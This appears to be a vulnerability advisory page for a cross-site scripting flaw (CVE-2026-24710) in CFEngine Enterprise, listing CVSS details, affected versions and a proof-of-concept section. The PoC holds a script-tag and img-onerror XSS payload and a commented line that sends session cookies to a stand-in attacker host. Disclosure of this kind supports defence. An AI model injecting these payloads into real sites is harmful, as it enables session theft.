Northern.tech CFEngine Enterprise before 3.21.8, 3.24.3, and 3.27.0 allows XSS.
CVSS Details
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
Northern.tech CFEngine Enterprise < 3.21.8
Northern.tech CFEngine Enterprise < 3.24.3
Northern.tech CFEngine Enterprise < 3.27.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for Stored XSS in CFEngine Enterprise -->
<!-- Inject this payload into a vulnerable input field -->
<script>
// Verify vulnerability execution
alert('XSS Vulnerability Confirmed - CVE-2026-24710');
// Example: Exfiltrate session cookies
// fetch('https://attacker-controlled-server.com/collect?cookie=' + encodeURIComponent(document.cookie));
</script>
<!-- Alternative Image Tag Payload -->
<img src=x onerror=alert('CVE-2026-24710')>